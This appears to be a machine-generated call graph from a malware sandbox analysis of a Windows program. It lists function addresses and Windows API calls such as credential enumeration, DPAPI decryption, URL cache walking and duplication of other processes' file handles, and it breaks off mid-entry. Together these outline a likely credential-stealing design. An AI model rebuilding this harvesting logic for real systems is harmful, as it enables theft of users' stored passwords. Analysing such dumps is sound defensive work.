4459cb 38354->38365 38374 40b6ef 253 API calls 38354->38374 38713 40ae18 38358->38713 38359 44566d 38359->38272 38629 413d4c 38359->38629 38370 445389 259 API calls 38360->38370 38371 445d71 38361->38371 38434 445d67 38361->38434 38363 445665 38745 40b1ab free free 38363->38745 38372 409d1f 6 API calls 38364->38372 38365->38285 38365->38286 38366->38308 38366->38321 38366->38322 38367 445389 259 API calls 38367->38292 38376 445c17 38370->38376 38852 445093 23 API calls 38371->38852 38379 445e03 38372->38379 38374->38365 38375 4456d8 38381 40b2cc 27 API calls 38375->38381 38382 40b2cc 27 API calls 38376->38382 38378 44563c 38378->38363 38384 4087b3 338 API calls 38378->38384 38853 409b98 GetFileAttributesW 38379->38853 38380 40b6ef 253 API calls 38380->38308 38386 4456e2 38381->38386 38387 445c23 38382->38387 38383 445d83 38383->38308 38384->38378 38747 413fa6 _wcsicmp _wcsicmp 38386->38747 38391 409d1f 6 API calls 38387->38391 38389 445e12 38396 445e6b 38389->38396 38403 40b2cc 27 API calls 38389->38403 38394 445c37 38391->38394 38392 445aa1 38395 445b17 38392->38395 38410 445ab2 memset 38392->38410 38423 409d1f 6 API calls 38392->38423 38720 40add4 38392->38720 38725 445389 38392->38725 38734 40ae51 38392->38734 38393 4456eb 38399 4456fd memset memset memset memset 38393->38399 38400 4457ea 38393->38400 38401 445389 259 API calls 38394->38401 38828 40aebe 38395->38828 38855 445093 23 API calls 38396->38855 38748 409c70 wcscpy wcsrchr 38399->38748 38751 413d29 38400->38751 38406 445c47 38401->38406 38407 445e33 38403->38407 38404 445e7e 38409 445f67 38404->38409 38412 40b2cc 27 API calls 38406->38412 38413 409d1f 6 API calls 38407->38413 38418 40b2cc 27 API calls 38409->38418 38414 40b2cc 27 API calls 38410->38414 38416 445c53 38412->38416 38417 445e47 38413->38417 38414->38392 38415 409c70 2 API calls 38419 44577e 38415->38419 38420 409d1f 6 API calls 38416->38420 38854 409b98 GetFileAttributesW 38417->38854 38422 445f73 38418->38422 38424 409c70 2 API calls 38419->38424 38425 445c67 38420->38425 38427 409d1f 6 API calls 38422->38427 38423->38392 38428 44578d 38424->38428 38429 445389 259 API calls 38425->38429 38426 445e56 38426->38396 38432 445e83 memset 38426->38432 38430 445f87 38427->38430 38428->38400 38436 40b2cc 27 API calls 38428->38436 38429->38292 38858 409b98 GetFileAttributesW 38430->38858 38435 40b2cc 27 API calls 38432->38435 38434->38308 38434->38380 38437 445eab 38435->38437 38438 4457a8 38436->38438 38439 409d1f 6 API calls 38437->38439 38440 409d1f 6 API calls 38438->38440 38441 445ebf 38439->38441 38442 4457b8 38440->38442 38443 40ae18 9 API calls 38441->38443 38750 409b98 GetFileAttributesW 38442->38750 38453 445ef5 38443->38453 38445 4457c7 38445->38400 38447 4087b3 338 API calls 38445->38447 38446 40ae51 9 API calls 38446->38453 38447->38400 38448 445f5c 38450 40aebe FindClose 38448->38450 38449 40add4 2 API calls 38449->38453 38450->38409 38451 40b2cc 27 API calls 38451->38453 38452 409d1f 6 API calls 38452->38453 38453->38446 38453->38448 38453->38449 38453->38451 38453->38452 38455 445f3a 38453->38455 38856 409b98 GetFileAttributesW 38453->38856 38857 445093 23 API calls 38455->38857 38457->38251 38458->38257 38459->38251 38460->38249 38462 40c775 38461->38462 38859 40b1ab free free 38462->38859 38464 40c788 38860 40b1ab free free 38464->38860 38466 40c790 38861 40b1ab free free 38466->38861 38468 40c798 38469 40aa04 free 38468->38469 38470 40c7a0 38469->38470 38862 40c274 memset 38470->38862 38475 40a8ab 9 API calls 38476 40c7c3 38475->38476 38477 40a8ab 9 API calls 38476->38477 38478 40c7d0 38477->38478 38891 40c3c3 38478->38891 38482 40c877 38491 40bdb0 38482->38491 38483 40c86c 38933 4053fe 39 API calls 38483->38933 38489 40c7e5 38489->38482 38489->38483 38490 40c634 50 API calls 38489->38490 38916 40a706 38489->38916 38490->38489 39196 404363 38491->39196 38494 40bf5d 39216 40440c 38494->39216 38495 40bdee 38495->38494 38499 40b2cc 27 API calls 38495->38499 38496 40bddf CredEnumerateW 38496->38495 38500 40be02 wcslen 38499->38500 38500->38494 38505 40be1e 38500->38505 38501 40be26 wcsncmp 38501->38505 38504 40be7d memset 38504->38505 38506 40bea7 memcpy 38504->38506 38505->38494 38505->38501 38505->38504 38505->38506 38507 40bf11 wcschr 38505->38507 38508 40b2cc 27 API calls 38505->38508 38510 40bf43 LocalFree 38505->38510 39219 40bd5d 28 API calls 38505->39219 39220 404423 38505->39220 38506->38505 38506->38507 38507->38505 38509 40bef6 _wcsnicmp 38508->38509 38509->38505 38509->38507 38510->38505 38511 4135f7 39235 4135e0 38511->39235 38514 40b2cc 27 API calls 38515 41360d 38514->38515 38516 40a804 8 API calls 38515->38516 38517 413613 38516->38517 38518 41361b 38517->38518 38519 41363e 38517->38519 38520 40b273 27 API calls 38518->38520 38521 4135e0 FreeLibrary 38519->38521 38522 413625 GetProcAddress 38520->38522 38523 413643 38521->38523 38522->38519 38524 413648 38522->38524 38523->38283 38525 413658 38524->38525 38526 4135e0 FreeLibrary 38524->38526 38525->38283 38527 413666 38526->38527 38527->38283 39238 4449b9 38528->39238 38545 40399d 38544->38545 39264 403a16 38545->39264 38547 403a09 39278 40b1ab free free 38547->39278 38549 403a12 wcsrchr 38549->38273 38550 4039a3 38550->38547 38553 4039f4 38550->38553 39275 40a02c CreateFileW 38550->39275 38553->38547 38554 4099c6 2 API calls 38553->38554 38554->38547 38556 414c2e 17 API calls 38555->38556 38557 404048 38556->38557 38558 414c2e 17 API calls 38557->38558 38559 404056 38558->38559 38560 409d1f 6 API calls 38559->38560 38561 404073 38560->38561 38562 409d1f 6 API calls 38561->38562 38563 40408e 38562->38563 38564 409d1f 6 API calls 38563->38564 38565 4040a6 38564->38565 38566 403af5 20 API calls 38565->38566 38567 4040ba 38566->38567 38568 403af5 20 API calls 38567->38568 38569 4040cb 38568->38569 39305 40414f memset 38569->39305 38571 404140 39319 40b1ab free free 38571->39319 38572 4040ec memset 38576 4040e0 38572->38576 38574 404148 38574->38338 38575 4099c6 2 API calls 38575->38576 38576->38571 38576->38572 38576->38575 38577 40a8ab 9 API calls 38576->38577 38577->38576 39332 40a6e6 WideCharToMultiByte 38578->39332 38580 4087ed 39333 4095d9 memset 38580->39333 38583 408809 memset memset memset memset memset 38584 40b2cc 27 API calls 38583->38584 38585 4088a1 38584->38585 38586 409d1f 6 API calls 38585->38586 38610 408953 38610->38338 38630 40b633 free 38629->38630 38631 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38630->38631 38632 413f00 Process32NextW 38631->38632 38633 413da5 OpenProcess 38632->38633 38634 413f17 CloseHandle 38632->38634 38635 413eb0 38633->38635 38636 413df3 memset 38633->38636 38634->38375 38635->38632 38638 413ebf free 38635->38638 38639 4099f4 3 API calls 38635->38639 39776 413f27 38636->39776 38638->38635 38639->38635 38640 413e1f 38641 413e37 GetModuleHandleW 38640->38641 39781 413959 38640->39781 39797 413ca4 38640->39797 38641->38640 38643 413e46 GetProcAddress 38641->38643 38643->38640 38645 413ea2 CloseHandle 38645->38635 38647 414c2e 17 API calls 38646->38647 38648 403eb7 38647->38648 38649 414c2e 17 API calls 38648->38649 38650 403ec5 38649->38650 38651 409d1f 6 API calls 38650->38651 38652 403ee2 38651->38652 38653 409d1f 6 API calls 38652->38653 38654 403efd 38653->38654 38655 409d1f 6 API calls 38654->38655 38656 403f15 38655->38656 38657 403af5 20 API calls 38656->38657 38658 403f29 38657->38658 38659 403af5 20 API calls 38658->38659 38660 403f3a 38659->38660 38661 40414f 33 API calls 38660->38661 38667 403f4f 38661->38667 38662 403faf 39811 40b1ab free free 38662->39811 38664 403f5b memset 38664->38667 38665 403fb7 38665->38311 38666 4099c6 2 API calls 38666->38667 38667->38662 38667->38664 38667->38666 38668 40a8ab 9 API calls 38667->38668 38668->38667 38670 414c2e 17 API calls 38669->38670 38671 403d26 38670->38671 38672 414c2e 17 API calls 38671->38672 38673 403d34 38672->38673 38674 409d1f 6 API calls 38673->38674 38675 403d51 38674->38675 38676 409d1f 6 API calls 38675->38676 38677 403d6c 38676->38677 38678 409d1f 6 API calls 38677->38678 38679 403d84 38678->38679 38680 403af5 20 API calls 38679->38680 38681 403d98 38680->38681 38682 403af5 20 API calls 38681->38682 38683 403da9 38682->38683 38684 40414f 33 API calls 38683->38684 38685 403dbe 38684->38685 38686 403e1e 38685->38686 38688 403dca memset 38685->38688 38690 4099c6 2 API calls 38685->38690 38691 40a8ab 9 API calls 38685->38691 39812 40b1ab free free 38686->39812 38688->38685 38689 403e26 38689->38326 38690->38685 38691->38685 38693 414b81 9 API calls 38692->38693 38694 414c40 38693->38694 38695 414c73 memset 38694->38695 39813 409cea 38694->39813 38697 414c94 38695->38697 39816 414592 RegOpenKeyExW 38697->39816 38700 414c64 SHGetSpecialFolderPathW 38702 414d0b 38700->38702 38701 414cc1 38703 414cf4 wcscpy 38701->38703 39817 414bb0 wcscpy 38701->39817 38702->38318 38703->38702 38705 414cd2 39818 4145ac RegQueryValueExW 38705->39818 38707 414ce9 RegCloseKey 38707->38703 38709 409d62 38708->38709 38710 409d43 wcscpy 38708->38710 38709->38349 38711 409719 2 API calls 38710->38711 38712 409d51 wcscat 38711->38712 38712->38709 38714 40aebe FindClose 38713->38714 38715 40ae21 38714->38715 38716 4099c6 2 API calls 38715->38716 38717 40ae35 38716->38717 38718 409d1f 6 API calls 38717->38718 38719 40ae49 38718->38719 38719->38392 38721 40ade0 38720->38721 38724 40ae0f 38720->38724 38722 40ade7 wcscmp 38721->38722 38721->38724 38723 40adfe wcscmp 38722->38723 38722->38724 38723->38724 38724->38392 38726 40ae18 9 API calls 38725->38726 38727 4453c4 38726->38727 38728 40ae51 9 API calls 38727->38728 38729 4453f3 38727->38729 38730 40add4 2 API calls 38727->38730 38733 445403 254 API calls 38727->38733 38728->38727 38731 40aebe FindClose 38729->38731 38730->38727 38732 4453fe 38731->38732 38732->38392 38733->38727 38735 40ae7b FindNextFileW 38734->38735 38736 40ae5c FindFirstFileW 38734->38736 38737 40ae94 38735->38737 38738 40ae8f 38735->38738 38736->38737 38740 40aeb6 38737->38740 38741 409d1f 6 API calls 38737->38741 38739 40aebe FindClose 38738->38739 38739->38737 38740->38392 38741->38740 38742->38303 38744->38378 38745->38359 38746->38359 38747->38393 38749 409c89 38748->38749 38749->38415 38750->38445 38752 413d39 38751->38752 38753 413d2f FreeLibrary 38751->38753 38754 40b633 free 38752->38754 38753->38752 38755 413d42 38754->38755 38756 40b633 free 38755->38756 38757 413d4a 38756->38757 38757->38272 38758->38275 38759->38328 38760->38342 38762 44db70 38761->38762 38763 40b6fc memset 38762->38763 38764 409c70 2 API calls 38763->38764 38765 40b732 wcsrchr 38764->38765 38766 40b743 38765->38766 38767 40b746 memset 38765->38767 38766->38767 38768 40b2cc 27 API calls 38767->38768 38769 40b76f 38768->38769 38770 409d1f 6 API calls 38769->38770 38771 40b783 38770->38771 39819 409b98 GetFileAttributesW 38771->39819 38773 40b792 38774 40b7c2 38773->38774 38775 409c70 2 API calls 38773->38775 39820 40bb98 38774->39820 38777 40b7a5 38775->38777 38779 40b2cc 27 API calls 38777->38779 38783 40b7b2 38779->38783 38780 40b837 CloseHandle 38782 40b83e memset 38780->38782 38781 40b817 38784 409a45 3 API calls 38781->38784 39853 40a6e6 WideCharToMultiByte 38782->39853 38786 409d1f 6 API calls 38783->38786 38787 40b827 CopyFileW 38784->38787 38786->38774 38787->38782 38788 40b866 38789 444432 121 API calls 38788->38789 38790 40b879 38789->38790 38791 40bad5 38790->38791 38792 40b273 27 API calls 38790->38792 38793 40baeb 38791->38793 38794 40bade DeleteFileW 38791->38794 38795 40b89a 38792->38795 38796 40b04b ??3@YAXPAX 38793->38796 38794->38793 38797 438552 134 API calls 38795->38797 38798 40baf3 38796->38798 38799 40b8a4 38797->38799 38798->38352 38800 40bacd 38799->38800 38802 4251c4 137 API calls 38799->38802 38801 443d90 111 API calls 38800->38801 38801->38791 38825 40b8b8 38802->38825 38803 40bac6 39863 424f26 123 API calls 38803->39863 38804 40b8bd memset 39854 425413 17 API calls 38804->39854 38807 425413 17 API calls 38807->38825 38810 40a71b MultiByteToWideChar 38810->38825 38811 40a734 MultiByteToWideChar 38811->38825 38814 40b9b5 memcmp 38814->38825 38815 4099c6 2 API calls 38815->38825 38816 404423 38 API calls 38816->38825 38819 40bb3e memset memcpy 39864 40a734 MultiByteToWideChar 38819->39864 38820 4251c4 137 API calls 38820->38825 38822 40bb88 LocalFree 38822->38825 38825->38803 38825->38804 38825->38807 38825->38810 38825->38811 38825->38814 38825->38815 38825->38816 38825->38819 38825->38820 38826 40ba5f memcmp 38825->38826 39855 4253ef 16 API calls 38825->39855 39856 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38825->39856 39857 4253af 17 API calls 38825->39857 39858 4253cf 17 API calls 38825->39858 39859 447280 memset 38825->39859 39860 447960 memset memcpy memcpy memcpy 38825->39860 39861 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38825->39861 39862 447920 memcpy memcpy memcpy 38825->39862 38826->38825 38827->38354 38829 40aed1 38828->38829 38830 40aec7 FindClose 38828->38830 38829->38286 38830->38829 38832 4099d7 38831->38832 38833 4099da memcpy 38831->38833 38832->38833 38833->38337 38835 40b2cc 27 API calls 38834->38835 38836 44543f 38835->38836 38837 409d1f 6 API calls 38836->38837 38838 44544f 38837->38838 39948 409b98 GetFileAttributesW 38838->39948 38840 44545e 38841 445476 38840->38841 38842 40b6ef 253 API calls 38840->38842 38843 40b2cc 27 API calls 38841->38843 38842->38841 38844 445482 38843->38844 38845 409d1f 6 API calls 38844->38845 38846 445492 38845->38846 39949 409b98 GetFileAttributesW 38846->39949 38848 4454a1 38849 4454b9 38848->38849 38850 40b6ef 253 API calls 38848->38850 38849->38367 38850->38849 38851->38366 38852->38383 38853->38389 38854->38426 38855->38404 38856->38453 38857->38453 38858->38434 38859->38464 38860->38466 38861->38468 38863 414c2e 17 API calls 38862->38863 38864 40c2ae 38863->38864 38934 40c1d3 38864->38934 38869 40c3be 38886 40a8ab 38869->38886 38870 40afcf 2 API calls 38871 40c2fd FindFirstUrlCacheEntryW 38870->38871 38872 40c3b6 38871->38872 38873 40c31e wcschr 38871->38873 38874 40b04b ??3@YAXPAX 38872->38874 38875 40c331 38873->38875 38876 40c35e FindNextUrlCacheEntryW 38873->38876 38874->38869 38878 40a8ab 9 API calls 38875->38878 38876->38873 38877 40c373 GetLastError 38876->38877 38879 40c3ad FindCloseUrlCache 38877->38879 38880 40c37e 38877->38880 38881 40c33e wcschr 38878->38881 38879->38872 38882 40afcf 2 API calls 38880->38882 38881->38876 38883 40c34f 38881->38883 38884 40c391 FindNextUrlCacheEntryW 38882->38884 38885 40a8ab 9 API calls 38883->38885 38884->38873 38884->38879 38885->38876 39123 40a97a 38886->39123 38889 40a8cc 38889->38475 38890 40a8d0 7 API calls 38890->38889 39128 40b1ab free free 38891->39128 38893 40c3dd 38894 40b2cc 27 API calls 38893->38894 38895 40c3e7 38894->38895 39129 414592 RegOpenKeyExW 38895->39129 38897 40c3f4 38898 40c50e 38897->38898 38899 40c3ff 38897->38899 38913 405337 38898->38913 38900 40a9ce 4 API calls 38899->38900 38901 40c418 memset 38900->38901 39130 40aa1d 38901->39130 38904 40c471 38906 40c47a _wcsupr 38904->38906 38905 40c505 RegCloseKey 38905->38898 38907 40a8d0 7 API calls 38906->38907 38908 40c498 38907->38908 38909 40a8d0 7 API calls 38908->38909 38910 40c4ac memset 38909->38910 38911 40aa1d 38910->38911 38912 40c4e4 RegEnumValueW 38911->38912 38912->38905 38912->38906 39132 405220 38913->39132 38917 4099c6 2 API calls 38916->38917 38918 40a714 _wcslwr 38917->38918 38919 40c634 38918->38919 39189 405361 38919->39189 38922 40c65c wcslen 39192 4053b6 39 API calls 38922->39192 38923 40c71d wcslen 38923->38489 38925 40c677 38926 40c713 38925->38926 39193 40538b 39 API calls 38925->39193 39195 4053df 39 API calls 38926->39195 38929 40c6a5 38929->38926 38930 40c6a9 memset 38929->38930 38931 40c6d3 38930->38931 39194 40c589 44 API calls 38931->39194 38933->38482 38935 40ae18 9 API calls 38934->38935 38941 40c210 38935->38941 38936 40ae51 9 API calls 38936->38941 38937 40c264 38938 40aebe FindClose 38937->38938 38940 40c26f 38938->38940 38939 40add4 2 API calls 38939->38941 38946 40e5ed memset memset 38940->38946 38941->38936 38941->38937 38941->38939 38942 40c231 _wcsicmp 38941->38942 38943 40c1d3 35 API calls 38941->38943 38942->38941 38944 40c248 38942->38944 38943->38941 38959 40c084 22 API calls 38944->38959 38947 414c2e 17 API calls 38946->38947 38948 40e63f 38947->38948 38949 409d1f 6 API calls 38948->38949 38950 40e658 38949->38950 38960 409b98 GetFileAttributesW 38950->38960 38952 40e667 38953 40e680 38952->38953 38954 409d1f 6 API calls 38952->38954 38961 409b98 GetFileAttributesW 38953->38961 38954->38953 38956 40e68f 38957 40c2d8 38956->38957 38962 40e4b2 38956->38962 38957->38869 38957->38870 38959->38941 38960->38952 38961->38956 38983 40e01e 38962->38983 38964 40e593 38965 40e5b0 38964->38965 38966 40e59c DeleteFileW 38964->38966 38967 40b04b ??3@YAXPAX 38965->38967 38966->38965 38969 40e5bb 38967->38969 38968 40e521 38968->38964 39006 40e175 38968->39006 38971 40e5c4 CloseHandle 38969->38971 38972 40e5cc 38969->38972 38971->38972 38974 40b633 free 38972->38974 38973 40e573 38975 40e584 38973->38975 38976 40e57c CloseHandle 38973->38976 38977 40e5db 38974->38977 39049 40b1ab free free 38975->39049 38976->38975 38980 40b633 free 38977->38980 38979 40e540 38979->38973 39026 40e2ab 38979->39026 38981 40e5e3 38980->38981 38981->38957 39050 406214 38983->39050 38986 40e16b 38986->38968 38989 40afcf 2 API calls 38990 40e08d OpenProcess 38989->38990 38991 40e0a4 GetCurrentProcess DuplicateHandle 38990->38991 38995 40e152 38990->38995 38992 40e0d0 GetFileSize 38991->38992 38993 40e14a CloseHandle 38991->38993 39086 409a45 GetTempPathW 38992->39086 38993->38995 38994 40e160 38998 40b04b ??3@YAXPAX 38994->38998 38995->38994 38997 406214 22 API calls 38995->38997 38997->38994 38998->38986 38999 40e0ea 39089 4096dc CreateFileW 38999->39089 39001 40e0f1 CreateFileMappingW 39002 40e140 CloseHandle CloseHandle 39001->39002 39003 40e10b MapViewOfFile 39001->39003 39002->38993 39004 40e13b CloseHandle 39003->39004 39005 40e11f WriteFile UnmapViewOfFile 39003->39005 39004->39002 39005->39004 39007 40e18c 39006->39007 39090 406b90 39007->39090 39010 40e1a7 memset 39016 40e1e8 39010->39016 39011 40e299 39100 4069a3 39011->39100 39017 40e283 39016->39017 39018 40dd50 _wcsicmp 39016->39018 39024 40e244 _snwprintf 39016->39024 39107 406e8f 13 API calls 39016->39107 39108 40742e 8 API calls 39016->39108 39109 40aae3 wcslen wcslen _memicmp 39016->39109 39110 406b53 SetFilePointerEx ReadFile 39016->39110 39019 40e291 39017->39019 39020 40e288 free 39017->39020 39018->39016 39021 40aa04 free 39019->39021 39020->39019 39021->39011 39025 40a8d0 7 API calls 39024->39025 39025->39016 39027 40e2c2 39026->39027 39028 406b90 11 API calls 39027->39028 39034 40e2d3 39028->39034 39029 40e4a0 39030 4069a3 2 API calls 39029->39030 39032 40e4ab 39030->39032 39032->38979 39034->39029 39035 40e489 39034->39035 39038 40dd50 _wcsicmp 39034->39038 39044 40e3e0 memcpy 39034->39044 39045 40e3fb memcpy 39034->39045 39046 40e3b3 wcschr 39034->39046 39047 40e416 memcpy 39034->39047 39048 40e431 memcpy 39034->39048 39111 406e8f 13 API calls 39034->39111 39112 40dd50 _wcsicmp 39034->39112 39121 40742e 8 API calls 39034->39121 39122 406b53 SetFilePointerEx ReadFile 39034->39122 39036 40aa04 free 39035->39036 39037 40e491 39036->39037 39037->39029 39039 40e497 free 39037->39039 39038->39034 39039->39029 39041 40e376 memset 39113 40aa29 39041->39113 39044->39034 39045->39034 39046->39034 39047->39034 39048->39034 39049->38964 39051 406294 CloseHandle 39050->39051 39052 406224 39051->39052 39053 4096c3 CreateFileW 39052->39053 39054 40622d 39053->39054 39055 406281 GetLastError 39054->39055 39056 40a2ef ReadFile 39054->39056 39060 40625a 39055->39060 39057 406244 39056->39057 39057->39055 39058 40624b 39057->39058 39059 406777 19 API calls 39058->39059 39058->39060 39059->39060 39060->38986 39061 40dd85 memset 39060->39061 39062 409bca GetModuleFileNameW 39061->39062 39063 40ddbe CreateFileW 39062->39063 39066 40ddf1 39063->39066 39064 40afcf ??2@YAPAXI ??3@YAXPAX 39064->39066 39065 41352f 9 API calls 39065->39066 39066->39064 39066->39065 39067 40de0b NtQuerySystemInformation 39066->39067 39068 40de3b CloseHandle GetCurrentProcessId 39066->39068 39067->39066 39069 40de54 39068->39069 39070 413d4c 46 API calls 39069->39070 39078 40de88 39070->39078 39071 40e00c 39072 413d29 free FreeLibrary 39071->39072 39073 40e014 39072->39073 39073->38986 39073->38989 39074 40dea9 _wcsicmp 39075 40dee7 OpenProcess 39074->39075 39076 40debd _wcsicmp 39074->39076 39075->39078 39076->39075 39077 40ded0 _wcsicmp 39076->39077 39077->39075 39077->39078 39078->39071 39078->39074 39079 40dfef CloseHandle 39078->39079 39080 40df23 GetCurrentProcess DuplicateHandle 39078->39080 39083 40df8f CloseHandle 39078->39083 39084 40df78 39078->39084 39079->39078 39080->39078 39081 40df4c memset 39080->39081 39082 41352f 9 API calls 39081->39082 39082->39078 39083->39084 39084->39079 39084->39083 39085 40dfae _wcsicmp 39084->39085 39085->39078 39085->39084 39087 409a74 GetTempFileNameW 39086->39087 39088 409a66 GetWindowsDirectoryW 39086->39088 39087->38999 39088->39087 39089->39001 39091 406bd5 39090->39091 39092 406bad 39090->39092 39094 4066bf free malloc memcpy free free 39091->39094 39099 406c0f 39091->39099 39092->39091 39093 406bba _wcsicmp 39092->39093 39093->39091 39093->39092 39095 406be5 39094->39095 39096 40afcf ??2@YAPAXI ??3@YAXPAX 39095->39096 39095->39099 39097 406bff 39096->39097 39098 4068bf SetFilePointerEx memcpy ReadFile ??2@YAPAXI ??3@YAXPAX 39097->39098 39098->39099 39099->39010 39099->39011 39101 4069c4 ??3@YAXPAX 39100->39101 39102 4069af 39101->39102 39103 40b633 free 39102->39103 39104 4069ba 39103->39104 39105 40b04b ??3@YAXPAX 39104->39105 39106 4069c2 39105->39106 39106->38979 39107->39016 39108->39016 39109->39016 39110->39016 39111->39034 39112->39041 39114 40aa33 39113->39114 39115 40aa63 39113->39115 39116 40aa44 39114->39116 39117 40aa38 wcslen 39114->39117 39115->39034 39118 40a9ce malloc memcpy free free 39116->39118 39117->39116 39119 40aa4d 39118->39119 39119->39115 39120 40aa51 memcpy 39119->39120 39120->39115 39121->39034 39122->39034 39124 40a980 39123->39124 39125 40a8bb 39124->39125 39126 40a995 _wcsicmp 39124->39126 39127 40a99c wcscmp 39124->39127 39125->38889 39125->38890 39126->39124 39127->39124 39128->38893 39129->38897 39131 40aa23 RegEnumValueW 39130->39131 39131->38904 39131->38905 39133 405335 39132->39133 39134 40522a 39132->39134 39133->38489 39135 40b2cc 27 API calls 39134->39135 39136 405234 39135->39136 39137 40a804 8 API calls 39136->39137 39138 40523a 39137->39138 39177 40b273 39138->39177 39140 405248 _mbscpy _mbscat GetProcAddress 39141 40b273 27 API calls 39140->39141 39142 405279 39141->39142 39180 405211 GetProcAddress 39142->39180 39144 405282 39145 40b273 27 API calls 39144->39145 39146 40528f 39145->39146 39181 405211 GetProcAddress 39146->39181 39148 405298 39149 40b273 27 API calls 39148->39149 39150 4052a5 39149->39150 39182 405211 GetProcAddress 39150->39182 39152 4052ae 39153 40b273 27 API calls 39152->39153 39154 4052bb 39153->39154 39183 405211 GetProcAddress 39154->39183 39156 4052c4 39157 40b273 27 API calls 39156->39157 39158 4052d1 39157->39158 39178 40b58d 27 API calls 39177->39178 39179 40b18c 39178->39179 39179->39140 39180->39144 39181->39148 39182->39152 39183->39156 39190 405220 39 API calls 39189->39190 39191 405369 39190->39191 39191->38922 39191->38923 39192->38925 39193->38929 39194->38926 39195->38923 39197 40440c FreeLibrary 39196->39197 39198 40436d 39197->39198 39199 40a804 8 API calls 39198->39199 39200 404377 39199->39200 39201 404383 39200->39201 39202 404405 39200->39202 39203 40b273 27 API calls 39201->39203 39202->38494 39202->38495 39202->38496 39204 40438d GetProcAddress 39203->39204 39205 40b273 27 API calls 39204->39205 39206 4043a7 GetProcAddress 39205->39206 39207 40b273 27 API calls 39206->39207 39208 4043ba GetProcAddress 39207->39208 39209 40b273 27 API calls 39208->39209 39210 4043ce GetProcAddress 39209->39210 39211 40b273 27 API calls 39210->39211 39212 4043e2 GetProcAddress 39211->39212 39213 4043f1 39212->39213 39214 4043f7 39213->39214 39215 40440c FreeLibrary 39213->39215 39214->39202 39215->39202 39217 404413 FreeLibrary 39216->39217 39218 40441e 39216->39218 39217->39218 39218->38511 39219->38505 39221 40447e 39220->39221 39222 40442e 39220->39222 39223 404485 CryptUnprotectData 39221->39223 39224 40449c 39221->39224 39225 40b2cc 27 API calls 39222->39225 39223->39224 39224->38505 39226 404438 39225->39226 39227 40a804 8 API calls 39226->39227 39228 40443e 39227->39228 39229 404445 39228->39229 39230 404467 39228->39230 39231 40b273 27 API calls 39229->39231 39230->39221 39233 404475 FreeLibrary 39230->39233 39232 40444f GetProcAddress 39231->39232 39232->39230 39234 404460 39232->39234 39233->39221 39234->39230 39236 4135f6 39235->39236 39237 4135eb FreeLibrary 39235->39237 39236->38514 39237->39236 39265 403a29 39264->39265 39279 403bed memset memset 39265->39279 39267 403ae7 39292 40b1ab free free 39267->39292 39269 403a3f memset 39273 403a2f 39269->39273 39270 403aef 39270->38550 39271 40a8d0 7 API calls 39271->39273 39272 409d1f 6 API calls 39272->39273 39273->39267 39273->39269 39273->39271 39273->39272 39274 409b98 GetFileAttributesW 39273->39274 39274->39273 39276 40a051 GetFileTime CloseHandle 39275->39276 39277 4039ca CompareFileTime 39275->39277 39276->39277 39277->38550 39278->38549 39280 414c2e 17 API calls 39279->39280 39281 403c38 39280->39281 39282 409719 2 API calls 39281->39282 39283 403c3f wcscat 39282->39283 39284 414c2e 17 API calls 39283->39284 39285 403c61 39284->39285 39286 409719 2 API calls 39285->39286 39287 403c68 wcscat 39286->39287 39293 403af5 39287->39293 39290 403af5 20 API calls 39291 403c95 39290->39291 39291->39273 39292->39270 39294 403b02 39293->39294 39295 40ae18 9 API calls 39294->39295 39303 403b37 39295->39303 39296 403bdb 39297 40aebe FindClose 39296->39297 39299 403be6 39297->39299 39298 40add4 wcscmp wcscmp 39298->39303 39299->39290 39300 40ae18 9 API calls 39300->39303 39301 40ae51 9 API calls 39301->39303 39302 40aebe FindClose 39302->39303 39303->39296 39303->39298 39303->39300 39303->39301 39303->39302 39304 40a8d0 7 API calls 39303->39304 39304->39303 39306 409d1f 6 API calls 39305->39306 39307 404190 39306->39307 39320 409b98 GetFileAttributesW 39307->39320 39309 40419c 39310 4041a7 6 API calls 39309->39310 39311 40435c 39309->39311 39313 40424f 39310->39313 39311->38576 39313->39311 39314 40425e memset 39313->39314 39316 409d1f 6 API calls 39313->39316 39317 40a8ab 9 API calls 39313->39317 39321 414842 39313->39321 39314->39313 39315 404296 wcscpy 39314->39315 39315->39313 39316->39313 39318 4042b6 memset memset _snwprintf wcscpy 39317->39318 39318->39313 39319->38574 39320->39309 39324 41443e 39321->39324 39323 414866 39323->39313 39325 41444b 39324->39325 39326 414451 39325->39326 39327 4144a3 GetPrivateProfileStringW 39325->39327 39328 414491 39326->39328 39329 414455 wcschr 39326->39329 39327->39323 39331 414495 WritePrivateProfileStringW 39328->39331 39329->39328 39330 414463 _snwprintf 39329->39330 39330->39331 39331->39323 39332->38580 39334 40b2cc 27 API calls 39333->39334 39335 409615 39334->39335 39336 409d1f 6 API calls 39335->39336 39337 409625 39336->39337 39362 409b98 GetFileAttributesW 39337->39362 39339 409634 39340 409648 39339->39340 39363 4091b8 memset 39339->39363 39342 40b2cc 27 API calls 39340->39342 39345 408801 39340->39345 39343 40965d 39342->39343 39344 409d1f 6 API calls 39343->39344 39346 40966d 39344->39346 39345->38583 39345->38610 39415 409b98 GetFileAttributesW 39346->39415 39348 40967c 39348->39345 39362->39339 39417 40a6e6 WideCharToMultiByte 39363->39417 39365 409202 39418 444432 39365->39418 39415->39348 39417->39365 39514 4438b5 39418->39514 39420 44444c 39515 4438d0 39514->39515 39525 4438c9 39514->39525 39525->39420 39803 413f4f 39776->39803 39779 413f37 K32GetModuleFileNameExW 39780 413f4a 39779->39780 39780->38640 39782 413969 wcscpy 39781->39782 39783 41396c wcschr 39781->39783 39786 413a3a 39782->39786 39783->39782 39785 41398e 39783->39785 39808 4097f7 wcslen wcslen _memicmp 39785->39808 39786->38640 39788 41399a 39789 4139a4 memset 39788->39789 39790 4139e6 39788->39790 39809 409dd5 GetWindowsDirectoryW wcscpy 39789->39809 39792 413a31 wcscpy 39790->39792 39793 4139ec memset 39790->39793 39792->39786 39810 409dd5 GetWindowsDirectoryW wcscpy 39793->39810 39794 4139c9 wcscpy wcscat 39794->39786 39796 413a11 memcpy wcscat 39796->39786 39798 413cb0 GetModuleHandleW 39797->39798 39799 413cda 39797->39799 39798->39799 39802 413cbf GetProcAddress 39798->39802 39800 413ce3 GetProcessTimes 39799->39800 39801 413cf6 39799->39801 39800->38645 39801->38645 39802->39799 39804 413f2f 39803->39804 39805 413f54 39803->39805 39804->39779 39804->39780 39806 40a804 8 API calls 39805->39806 39807 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39806->39807 39807->39804 39808->39788 39809->39794 39810->39796 39811->38665 39812->38689 39814 